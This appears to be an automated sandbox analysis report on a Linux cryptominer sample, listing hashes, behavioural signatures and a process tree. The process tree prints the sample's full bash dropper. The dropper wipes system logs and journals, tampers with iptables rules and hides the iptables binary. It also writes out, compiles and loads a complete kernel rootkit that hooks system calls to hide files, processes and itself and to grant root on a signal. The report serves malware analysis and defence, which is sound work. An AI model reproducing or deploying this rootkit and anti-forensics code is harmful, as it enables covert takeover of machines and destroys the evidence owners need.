Analysis
-
max time kernel
1s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
15-09-2024 06:01
Static task
static1
Behavioral task
behavioral1
Sample
initrd_21dbdc1f
Resource
ubuntu1804-amd64-20240611-en
General
-
Target
initrd_21dbdc1f
-
Size
32KB
-
MD5
a3ba12b3990ff7518678c9c9a90e9aa8
-
SHA1
81375fad1155bb8a04fb229c311aac1ae28ebb17
-
SHA256
7dc6436dbcefb6bf21c7f50ee08ca25df00324c638ff3c9a25ff03636362794d
-
SHA512
2b2be2e25d0ca527e56d6aa4f4a980298b74f9a30876c9786de863881c2477735170d33f2239540765d1a53a75f79cdbf857dc971a2822badb01cbaec5185ef7
-
SSDEEP
384:yn+QBT1NLGhk8tGJAeMnsppgRE9hCxKpLIgP8JxvbIUpGJSnQVXUX7SbTR:y+QFT6dtGJAejpxf183bIUoAnQWObT
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Processes:
journalctldescription ioc process File deleted /var/log/journal/11c67417355f45d397f6be11f62e85a6/system@e02a408b9d414625906196302af2c2b1-0000000000000001-00061aa0a1a5bee1.journal journalctl File deleted /var/log/journal/11c67417355f45d397f6be11f62e85a6/[email protected]~ journalctl -
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
rmdescription ioc process File deleted /var/log/syslog rm -
Processes:
insmodioc pid process /tmp/a/ipmi_devinfo.ko 2239 insmod -
Processes:
rmrmrmdescription ioc process File deleted /var/log/messages* rm File deleted /var/log/secure* rm File deleted /var/log/auth.log rm -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads list of loaded kernel modules 1 TTPs 2 IoCs
Reads the list of currently loaded kernel modules, possibly to detect virtual environments.
Processes:
grepgrepdescription ioc process File opened for reading /proc/modules grep File opened for reading /proc/modules grep -
Reads CPU attributes 1 TTPs 1 IoCs
Processes:
psdescription ioc process File opened for reading /sys/devices/system/cpu/online ps -
Command and Scripting Interpreter: Unix Shell 1 TTPs 64 IoCs
Execute scripts via Unix Shell.
Processes:
shshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshpid process 2117 sh 2168 sh 1673 sh 1706 sh 1741 sh 1964 sh 2068 sh 2082 sh 2096 sh 1691 sh 1592 sh 1644 sh 2127 sh 2230 sh 1587 sh 1705 sh 1774 sh 2067 sh 2154 sh 1559 sh 1798 sh 1845 sh 1867 sh 2026 sh 2053 sh 1659 sh 1814 sh 2039 sh 1772 sh 1881 sh 1908 sh 2033 sh 2047 sh 2103 sh 2152 sh 1874 sh 1895 sh 1909 sh 1925 sh 2011 sh 2012 sh 2046 sh 2074 sh 1755 sh 2223 sh 2145 sh 1821 sh 2032 sh 2149 sh 2150 sh 1733 sh 1666 sh 1680 sh 2237 sh 1626 sh 1685 sh 1698 sh 1790 sh 1972 sh 2108 sh 2147 sh 1600 sh 2089 sh 2132 sh -
Processes:
psmvfindmkdirmkdirmkdirxargsmkdirmkdirmkdirmkdirmkdircpmkdirdescription ioc process File opened for reading /proc/29/status ps File opened for reading /proc/78/cmdline ps File opened for reading /proc/1100/stat ps File opened for reading /proc/1256/stat ps File opened for reading /proc/1483/stat ps File opened for reading /proc/filesystems mv File opened for reading /proc/34/status ps File opened for reading /proc/24/cmdline ps File opened for reading /proc/78/status ps File opened for reading /proc/202/stat ps File opened for reading /proc/241/cmdline ps File opened for reading /proc/476/cmdline ps File opened for reading /proc/1141/status ps File opened for reading /proc/1158/status ps File opened for reading /proc/filesystems find File opened for reading /proc/25/status ps File opened for reading /proc/167/status ps File opened for reading /proc/172/status ps File opened for reading /proc/1011/cmdline ps File opened for reading /proc/1274/cmdline ps File opened for reading /proc/1283/cmdline ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/27/cmdline ps File opened for reading /proc/31/cmdline ps File opened for reading /proc/267/stat ps File opened for reading /proc/1611/cmdline ps File opened for reading /proc/1108/status ps File opened for reading /proc/1157/cmdline ps File opened for reading /proc/1159/status ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems mkdir File opened for reading /proc/23/status ps File opened for reading /proc/482/status ps File opened for reading /proc/647/stat ps File opened for reading /proc/672/status ps File opened for reading /proc/1134/stat ps File opened for reading /proc/self/fd xargs File opened for reading /proc/1483/cmdline ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/1/status ps File opened for reading /proc/1127/status ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/32/status ps File opened for reading /proc/85/cmdline ps File opened for reading /proc/164/stat ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/34/stat ps File opened for reading /proc/1242/stat ps File opened for reading /proc/165/status ps File opened for reading /proc/172/cmdline ps File opened for reading /proc/858/status ps File opened for reading /proc/1212/stat ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems mkdir File opened for reading /proc/14/status ps File opened for reading /proc/1031/stat ps File opened for reading /proc/filesystems cp File opened for reading /proc/11/status ps File opened for reading /proc/84/cmdline ps File opened for reading /proc/311/cmdline ps File opened for reading /proc/655/status ps File opened for reading /proc/978/status ps File opened for reading /proc/1155/status ps File opened for reading /proc/filesystems mkdir -
Writes file to tmp directory 64 IoCs
Malware often drops required files in the /tmp directory.
Processes:
gccshshshshcollect2bashasasshshshgccasshcc1gccasgccgccasshasshshcc1shshshcc1shascc1asasascc1asshshgccshshasgccshcollect2shasshshshasasasasasasgccshgccasdescription ioc process File opened for modification /tmp/cc72gfN9.s gcc File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/ccXa1V7e.ld collect2 File opened for modification /tmp/a/ipmi_devinfo.h bash File opened for modification /tmp/a/.tmp_1673/tmp as File opened for modification /tmp/a/.tmp_1685/tmp as File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/cczWGsFi.s gcc File opened for modification /tmp/a/.tmp_1720/tmp as File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/cc2YOfSW.s cc1 File opened for modification /tmp/ccD3JHZc.s gcc File opened for modification /tmp/a/.tmp_1965/tmp as File opened for modification /tmp/ccQsvAWb.s gcc File opened for modification /tmp/ccoHbZ1o.s gcc File opened for modification /tmp/a/.tmp_1774/tmp as File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.tmp_1895/tmp as File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/ccnndo0Y.s cc1 File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/ccFRKlxj.s cc1 File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.tmp_2096/tmp as File opened for modification /tmp/ccVzw0N2.s cc1 File opened for modification /tmp/a/.tmp_1699/tmp as File opened for modification /tmp/a/.tmp_1734/tmp as File opened for modification /tmp/a/.tmp_1881/tmp as File opened for modification /tmp/a/ipmi_devinfo.c bash File opened for modification /tmp/ccoHbZ1o.s cc1 File opened for modification /tmp/a/.tmp_1814/tmp as File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/cciQE6Tm.s gcc File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.tmp_2089/tmp as File opened for modification /tmp/ccEXSwF4.s gcc File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/ccQEwL72.c collect2 File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.tmp_2061/tmp as File opened for modification /tmp/a/.ipmi_devinfo.mod.o.tmp sh File opened for modification /tmp/a/.ipmi_devinfo.ko.cmd sh File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/a/.tmp_1838/tmp as File opened for modification /tmp/a/.tmp_1902/tmp as File opened for modification /tmp/a/.tmp_1972/tmp as File opened for modification /tmp/a/.tmp_1652/tmp as File opened for modification /tmp/a/.tmp_1958/tmp as File opened for modification /tmp/a/.tmp_1790/tmp as File opened for modification /tmp/a/Makefile bash File opened for modification /tmp/cc2YOfSW.s gcc File opened for modification /tmp/a/.cache.mk sh File opened for modification /tmp/ccQiJiD9.s gcc File opened for modification /tmp/a/.tmp_1981/tmp as
Processes
-
/tmp/initrd_21dbdc1f/tmp/initrd_21dbdc1f1⤵PID:1483
-
/bin/bash/tmp/initrd_21dbdc1f -c "exec '/tmp/initrd_21dbdc1f' \"\$@\"" /tmp/initrd_21dbdc1f1⤵PID:1483
-
/tmp/initrd_21dbdc1f/tmp/initrd_21dbdc1f1⤵PID:1483
-
/bin/bash/tmp/initrd_21dbdc1f -c " #!/bin/bash rm -rf /var/www/html/config.json rm -rf /root/.xmrig.json rm -rf /root/.config/xmrig.json rm -rf /var/log/messages* rm -rf /var/log/secure* rm -rf /var/log/auth.log* rm -rf /var/log/syslog* echo \"fs.file-max = 2097152\" > /etc/sysctl.conf sysctl -p ulimit -SHn 1024000 mv /usr/sbin/tokens /usr/sbin/iptables 2>/dev/null 1>/dev/null& mv /sbin/tokens /sbin/iptables 2>/dev/null 1>/dev/null& iptables -L INPUT -v -n | grep 138.68 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 67.207 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 46.101 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 157.245 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 146.190 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 144.126 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 167.172 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 172.104 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 172.105 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s mv /usr/sbin/iptables /usr/sbin/tokens 2>/dev/null 1>/dev/null& mv /sbin/iptables /sbin/tokens 2>/dev/null 1>/dev/null& module_install () { mkdir /tmp/a cat <<EOF >>/tmp/a/ipmi_devinfo.h struct linux_dirent { unsigned long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[1]; }; #define MAGIC_PREFIX \"initrd_\" #define PF_INVISIBLE 0x10000000 #define MODULE_NAME \"ipmi_devinfo\" enum { SIGINVIS = 41, SIGSUPER = 54, SIGMODINVIS = 53, }; #ifndef IS_ENABLED #define IS_ENABLED(option) \\ (defined(__enabled_ ## option) || defined(__enabled_ ## option ## _MODULE)) #endif #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0) #define KPROBE_LOOKUP 1 #include <linux/kprobes.h> static struct kprobe kp = { .symbol_name = \"kallsyms_lookup_name\" }; #endif EOF cat <<EOF >>/tmp/a/ipmi_devinfo.c #include <linux/sched.h> #include <linux/module.h> #include <linux/syscalls.h> #include <linux/dirent.h> #include <linux/slab.h> #include <linux/version.h> #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 13, 0) #include <asm/uaccess.h> #endif #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 10, 0) #include <linux/proc_ns.h> #else #include <linux/proc_fs.h> #endif #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 26) #include <linux/file.h> #else #include <linux/fdtable.h> #endif #if LINUX_VERSION_CODE <= KERNEL_VERSION(2, 6, 18) #include <linux/unistd.h> #endif #ifndef __NR_getdents #define __NR_getdents 141 #endif #include \"ipmi_devinfo.h\" #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) unsigned long cr0; #elif IS_ENABLED(CONFIG_ARM64) void (*update_mapping_prot)(phys_addr_t phys, unsigned long virt, phys_addr_t size, pgprot_t prot); unsigned long start_rodata; unsigned long init_begin; #define section_size init_begin - start_rodata #endif static unsigned long *__sys_call_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) typedef asmlinkage long (*t_syscall)(const struct pt_regs *); static t_syscall orig_getdents; static t_syscall orig_getdents64; static t_syscall orig_kill; #else typedef asmlinkage int (*orig_getdents_t)(unsigned int, struct linux_dirent *, unsigned int); typedef asmlinkage int (*orig_getdents64_t)(unsigned int, struct linux_dirent64 *, unsigned int); typedef asmlinkage int (*orig_kill_t)(pid_t, int); orig_getdents_t orig_getdents; orig_getdents64_t orig_getdents64; orig_kill_t orig_kill; #endif unsigned long * get_syscall_table_bf(void) { unsigned long *syscall_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0) #ifdef KPROBE_LOOKUP typedef unsigned long (*kallsyms_lookup_name_t)(const char *name); kallsyms_lookup_name_t kallsyms_lookup_name; register_kprobe(&kp); kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr; unregister_kprobe(&kp); #endif syscall_table = (unsigned long*)kallsyms_lookup_name(\"sys_call_table\"); return syscall_table; #else unsigned long int i; for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) { syscall_table = (unsigned long *)i; if (syscall_table[__NR_close] == (unsigned long)sys_close) return syscall_table; } return NULL; #endif } struct task_struct * find_task(pid_t pid) { struct task_struct *p = current; for_each_process(p) { if (p->pid == pid) return p; } return NULL; } int is_invisible(pid_t pid) { struct task_struct *task; if (!pid) return 0; task = find_task(pid); if (!task) return 0; if (task->flags & PF_INVISIBLE) return 1; return 0; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static asmlinkage long hacked_getdents64(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) int fd = (int) pt_regs->di; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) int fd = (int) pt_regs->regs[0]; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1]; #endif int ret = orig_getdents64(pt_regs), err; #else asmlinkage int hacked_getdents64(unsigned int fd, struct linux_dirent64 __user *dirent, unsigned int count) { int ret = orig_getdents64(fd, dirent, count), err; #endif unsigned short proc = 0; unsigned long off = 0; struct linux_dirent64 *dir, *kdirent, *prev = NULL; struct inode *d_inode; if (ret <= 0) return ret; kdirent = kzalloc(ret, GFP_KERNEL); if (kdirent == NULL) return ret; err = copy_from_user(kdirent, dirent, ret); if (err) goto out; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev) /*&& MINOR(d_inode->i_rdev) == 1*/) proc = 1; while (off < ret) { dir = (void *)kdirent + off; if ((!proc && (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0)) || (proc && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) { if (dir == kdirent) { ret -= dir->d_reclen; memmove(dir, (void *)dir + dir->d_reclen, ret); continue; } prev->d_reclen += dir->d_reclen; } else prev = dir; off += dir->d_reclen; } err = copy_to_user(dirent, kdirent, ret); if (err) goto out; out: kfree(kdirent); return ret; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static asmlinkage long hacked_getdents(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) int fd = (int) pt_regs->di; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) int fd = (int) pt_regs->regs[0]; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1]; #endif int ret = orig_getdents(pt_regs), err; #else asmlinkage int hacked_getdents(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { int ret = orig_getdents(fd, dirent, count), err; #endif unsigned short proc = 0; unsigned long off = 0; struct linux_dirent *dir, *kdirent, *prev = NULL; struct inode *d_inode; if (ret <= 0) return ret; kdirent = kzalloc(ret, GFP_KERNEL); if (kdirent == NULL) return ret; err = copy_from_user(kdirent, dirent, ret); if (err) goto out; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev) /*&& MINOR(d_inode->i_rdev) == 1*/) proc = 1; while (off < ret) { dir = (void *)kdirent + off; if ((!proc && (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0)) || (proc && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) { if (dir == kdirent) { ret -= dir->d_reclen; memmove(dir, (void *)dir + dir->d_reclen, ret); continue; } prev->d_reclen += dir->d_reclen; } else prev = dir; off += dir->d_reclen; } err = copy_to_user(dirent, kdirent, ret); if (err) goto out; out: kfree(kdirent); return ret; } void give_root(void) { #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) current->uid = current->gid = 0; current->euid = current->egid = 0; current->suid = current->sgid = 0; current->fsuid = current->fsgid = 0; #else struct cred *newcreds; newcreds = prepare_creds(); if (newcreds == NULL) return; #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0) \\ && defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS) \\ || LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0) newcreds->uid.val = newcreds->gid.val = 0; newcreds->euid.val = newcreds->egid.val = 0; newcreds->suid.val = newcreds->sgid.val = 0; newcreds->fsuid.val = newcreds->fsgid.val = 0; #else newcreds->uid = newcreds->gid = 0; newcreds->euid = newcreds->egid = 0; newcreds->suid = newcreds->sgid = 0; newcreds->fsuid = newcreds->fsgid = 0; #endif commit_creds(newcreds); #endif } static inline void tidy(void) { kfree(THIS_MODULE->sect_attrs); THIS_MODULE->sect_attrs = NULL; } static struct list_head *module_previous; static short module_hidden = 0; void module_show(void) { list_add(&THIS_MODULE->list, module_previous); module_hidden = 0; } void module_hide(void) { module_previous = THIS_MODULE->list.prev; list_del(&THIS_MODULE->list); module_hidden = 1; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) asmlinkage int hacked_kill(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) pid_t pid = (pid_t) pt_regs->di; int sig = (int) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) pid_t pid = (pid_t) pt_regs->regs[0]; int sig = (int) pt_regs->regs[1]; #endif #else asmlinkage int hacked_kill(pid_t pid, int sig) { #endif struct task_struct *task; switch (sig) { case SIGINVIS: if ((task = find_task(pid)) == NULL) return -ESRCH; task->flags ^= PF_INVISIBLE; break; case SIGSUPER: give_root(); break; case SIGMODINVIS: if (module_hidden) module_show(); else module_hide(); break; default: #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) return orig_kill(pt_regs); #else return orig_kill(pid, sig); #endif } return 0; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static inline void write_cr0_forced(unsigned long val) { unsigned long __force_order; asm volatile( \"mov %0, %%cr0\" : \"+r\"(val), \"+m\"(__force_order)); } #endif static inline void protect_memory(void) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) write_cr0_forced(cr0); #else write_cr0(cr0); #endif #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata, section_size, PAGE_KERNEL_RO); #endif } static inline void unprotect_memory(void) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) write_cr0_forced(cr0 & ~0x00010000); #else write_cr0(cr0 & ~0x00010000); #endif #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata, section_size, PAGE_KERNEL); #endif } static int __init ipmi_devinfo_init(void) { __sys_call_table = get_syscall_table_bf(); if (!__sys_call_table) return -1; #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) cr0 = read_cr0(); #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot = (void *)kallsyms_lookup_name(\"update_mapping_prot\"); start_rodata = (unsigned long)kallsyms_lookup_name(\"__start_rodata\"); init_begin = (unsigned long)kallsyms_lookup_name(\"__init_begin\"); #endif module_hide(); tidy(); #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) orig_getdents = (t_syscall)__sys_call_table[__NR_getdents]; orig_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64]; orig_kill = (t_syscall)__sys_call_table[__NR_kill]; #else orig_getdents = (orig_getdents_t)__sys_call_table[__NR_getdents]; orig_getdents64 = (orig_getdents64_t)__sys_call_table[__NR_getdents64]; orig_kill = (orig_kill_t)__sys_call_table[__NR_kill]; #endif unprotect_memory(); __sys_call_table[__NR_getdents] = (unsigned long) hacked_getdents; __sys_call_table[__NR_getdents64] = (unsigned long) hacked_getdents64; __sys_call_table[__NR_kill] = (unsigned long) hacked_kill; protect_memory(); return 0; } static void __exit ipmi_devinfo_cleanup(void) { unprotect_memory(); __sys_call_table[__NR_getdents] = (unsigned long) orig_getdents; __sys_call_table[__NR_getdents64] = (unsigned long) orig_getdents64; __sys_call_table[__NR_kill] = (unsigned long) orig_kill; protect_memory(); } module_init(ipmi_devinfo_init); module_exit(ipmi_devinfo_cleanup); MODULE_LICENSE(\"Dual BSD/GPL\"); MODULE_AUTHOR(\"m0nad\"); MODULE_DESCRIPTION(\"LKM rootkit\"); EOF cat <<EOF >>/tmp/a/Makefile obj-m := ipmi_devinfo.o CC = gcc -Wall KDIR := /lib/modules/`uname -r`/build PWD := /tmp/a EOF make -C /lib/modules/`uname -r`/build M=/tmp/a modules insmod /tmp/a/ipmi_devinfo.ko rm -rf /tmp/a } port=\$1 EXE=`echo \$RANDOM | md5sum | head -c 8` DIR1=\"/opt\" if [ -d \"\$DIR1\" ]; then echo \"folder ok\" else mkdir \"\$DIR1\" fi DIR2=\"/opt/system-cache\" if [ -d \"\$DIR2\" ]; then echo \"folder ok\" else mkdir \"\$DIR2\" fi DIR3=\"/opt/system-cache/initrd_\" if [ -d \"\$DIR3\" ]; then echo \"folder ok\" else mkdir \"\$DIR3\" fi PID=`cat /opt/system-cache/initrd_/.cache` if [ -e \"/proc/\$PID/status\" ]; then echo \"ss ok\" for pid in \$(ps -ef | awk '/system-cache/ {print \$2}'); do kill -41 \$pid; done else echo \"ss is not runing\" cp /etc/dns/initrd_/dnsresolve /\$EXE /\$EXE -m -t -p /opt/system-cache/initrd_/.cache -b 0.0.0.0:\"\$port\" rm -rf /\$EXE kill -53 10000000 if grep -q \"ipmi_devinfo\" \"/proc/modules\"; then echo \"M exists\" for pid in \$(ps -ef | awk '/system-cache/ {print \$2}'); do kill -41 \$pid; done kill -53 10000000 else echo \"M not exists, installing...\" module_install kill -53 10000000 if grep -q \"ipmi_devinfo\" \"/proc/modules\"; then echo \"M exists\" for pid in \$(ps -ef | awk '/system-cache/ {print \$2}'); do kill -41 \$pid; done kill -53 10000000 else echo \"M not installed check errors\" fi fi fi journalctl --vacuum-time=1s " /tmp/initrd_21dbdc1f1⤵
- Writes file to tmp directory
PID:1483 -
/bin/rmrm -rf /var/www/html/config.json2⤵PID:1484
-
/bin/rmrm -rf /root/.xmrig.json2⤵PID:1485
-
/bin/rmrm -rf /root/.config/xmrig.json2⤵PID:1486
-
/bin/rmrm -rf "/var/log/messages*"2⤵
- Deletes log files
PID:1487 -
/bin/rmrm -rf "/var/log/secure*"2⤵
- Deletes log files
PID:1488 -
/bin/rmrm -rf /var/log/auth.log2⤵
- Deletes log files
PID:1489 -
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1490 -
/sbin/sysctlsysctl -p2⤵PID:1491
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1497
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1496
-
/bin/grepgrep 138.682⤵PID:1495
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1494
-
/bin/mvmv /sbin/tokens /sbin/iptables2⤵PID:1493
-
/bin/mvmv /usr/sbin/tokens /usr/sbin/iptables2⤵PID:1492
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1503
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1502
-
/bin/grepgrep 67.2072⤵PID:1501
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1500
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1507
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1506
-
/bin/grepgrep 46.1012⤵PID:1505
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1504
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1511
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1510
-
/bin/grepgrep 157.2452⤵PID:1509
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1508
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1515
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1514
-
/bin/grepgrep 146.1902⤵PID:1513
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1512
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1519
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1518
-
/bin/grepgrep 144.1262⤵PID:1517
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1516
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1523
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1522
-
/bin/grepgrep 167.1722⤵PID:1521
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1520
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1527
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1526
-
/bin/grepgrep 172.1042⤵PID:1525
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1524
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1531
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1530
-
/bin/grepgrep 172.1052⤵PID:1529
-
/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1528
-
/bin/mvmv /sbin/iptables /sbin/tokens2⤵
- Reads runtime system information
PID:1533 -
/usr/bin/headhead -c 82⤵PID:1537
-
/usr/bin/md5summd5sum2⤵PID:1536
-
/bin/mvmv /usr/sbin/iptables /usr/sbin/tokens2⤵PID:1532
-
/bin/mkdirmkdir /opt/system-cache2⤵PID:1538
-
/bin/mkdirmkdir /opt/system-cache/initrd_2⤵PID:1539
-
/bin/catcat /opt/system-cache/initrd_/.cache2⤵PID:1541
-
/bin/cpcp /etc/dns/initrd_/dnsresolve /4acd01a52⤵
- Reads runtime system information
PID:1542 -
/4acd01a5/4acd01a5 -m -t -p /opt/system-cache/initrd_/.cache -b 0.0.0.0:2⤵PID:1543
-
/bin/rmrm -rf /4acd01a52⤵PID:1544
-
/bin/grepgrep -q ipmi_devinfo /proc/modules2⤵
- Reads list of loaded kernel modules
PID:1545 -
/bin/mkdirmkdir /tmp/a2⤵PID:1546
-
/bin/catcat2⤵PID:1547
-
/bin/catcat2⤵PID:1548
-
/bin/unameuname -r2⤵PID:1551
-
/bin/catcat2⤵PID:1549
-
/bin/unameuname -r2⤵PID:1553
-
/usr/bin/makemake -C /lib/modules/4.15.0-213-generic/build "M=/tmp/a" modules2⤵PID:1554
-
/bin/sh/bin/sh -c "uname -m | sed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e s/arm.*/arm/ -e s/sa110/arm/ -e s/s390x/s390/ -e s/parisc64/parisc/ -e s/ppc.*/powerpc/ -e s/mips.*/mips/ -e s/sh[234].*/sh/ -e s/aarch64.*/arm64/ -e s/riscv.*/riscv/"3⤵PID:1555
-
/bin/sedsed -e s/i.86/x86/ -e s/x86_64/x86/ -e s/sun4u/sparc64/ -e "s/arm.*/arm/" -e s/sa110/arm/ -e s/s390x/s390/ -e s/parisc64/parisc/ -e "s/ppc.*/powerpc/" -e "s/mips.*/mips/" -e "s/sh[234].*/sh/" -e "s/aarch64.*/arm64/" -e "s/riscv.*/riscv/"4⤵PID:1557
-
/bin/unameuname -m4⤵PID:1556
-
/bin/sh/bin/sh -c "if [ -x \"\$BASH\" ]; then echo \$BASH; else if [ -x /bin/bash ]; then echo /bin/bash; else echo sh; fi ; fi"3⤵PID:1558
-
/bin/sh/bin/sh -c "getconf LFS_CFLAGS 2>/dev/null"3⤵
- Command and Scripting Interpreter: Unix Shell
PID:1559 -
